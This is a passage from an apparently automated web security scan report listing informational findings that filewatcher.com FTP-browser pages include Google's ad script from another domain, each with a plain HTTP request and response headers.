Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "rjThj+PS21MFIVyzFxK2OA"
Content-Length: 11050
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 529
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Open
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.835. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Be9MxGJHFYwaJEJVBfzsxg"
Content-Length: 6109
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 534
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Open
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.836. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages/i386.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "kYqKtrPfE55qXRkj0S2mLw"
Content-Length: 35859
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 534
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Open
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.837. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages/sparc.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages/sparc.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1/packages/sparc.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:42 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ntyeDRfsWBTcZl4nZ9IF3Q"
Content-Length: 47669
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 536
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Open
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.838. http://www.filewatcher.com/b/ftp/ftp.free.fr.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.free.fr.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:47 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "jNFRt5G/WCzXrFDTU+nsyw"
Content-Length: 8401
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 659
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/ - FTP Browser</titl
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.839. http://www.filewatcher.com/b/ftp/ftp.free.fr/.mirrors1.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.free.fr/.mirrors1.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr/.mirrors1.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:48 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "TBVGHZq0doRuMCfPipzMsQ"
Content-Length: 10083
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 661
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/.mirrors1/ - FTP Bro
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.840. http://www.filewatcher.com/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:48 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "iOYZtC69gIuS2hVIVmezLw"
Content-Length: 14149
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 664
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/.mirrors1/ftp.freebs
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.841. http://www.filewatcher.com/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:49 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "bOf/qx5WQrlmOck7X4vvEQ"
Content-Length: 8419
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:49 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 666
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/.mirrors1/ftp.freebs
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.842. http://www.filewatcher.com/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:49 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "XrAza1K22KZ90FSXCy91lg"
Content-Length: 8884
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:49 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 666
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/.mirrors1/ftp.freebs
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.843. http://www.filewatcher.com/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-7.0-release.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-7.0-release.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-7.0-release.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:50 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "mXgblmJpBdkJVXIOV3ERbg"
Content-Length: 26703
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 666
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/.mirrors1/ftp.freebs
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.844. http://www.filewatcher.com/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-7.0-release/All.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-7.0-release/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-7.0-release/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:51 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "4azPs4bM40LsB81ShCAZ3Q"
Content-Length: 52151
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 666
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/.mirrors1/ftp.freebs
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.845. http://www.filewatcher.com/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-8-current.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-8-current.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-8-current.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:52 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ThJo9BQkZIyrwn8LJvQe1Q"
Content-Length: 26484
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 668
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/.mirrors1/ftp.freebs
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.846. http://www.filewatcher.com/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-8-current/All.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-8-current/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.free.fr/.mirrors1/ftp.freebsd.org/ports/sparc64/packages-8-current/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:53 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ds7U19Do71a1+HUOGbUbhw"
Content-Length: 24494
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 669
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.free.fr/.mirrors1/ftp.freebs
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.847. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.internat.freebsd.org.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Y6jvHZmDZXYZlHbEvkl1+Q"
Content-Length: 5409
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 478
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/ - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.848. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.internat.freebsd.org/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "P95cKLXK8vUKmIvgGsWH6g"
Content-Length: 7958
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 482
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.849. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:25 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "jaasUbMbVUV6hVShNtimyA"
Content-Length: 13241
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 484
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.850. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:25 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "SKpe6fwAixjXy0o1tXJYRA"
Content-Length: 23376
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 485
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.851. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
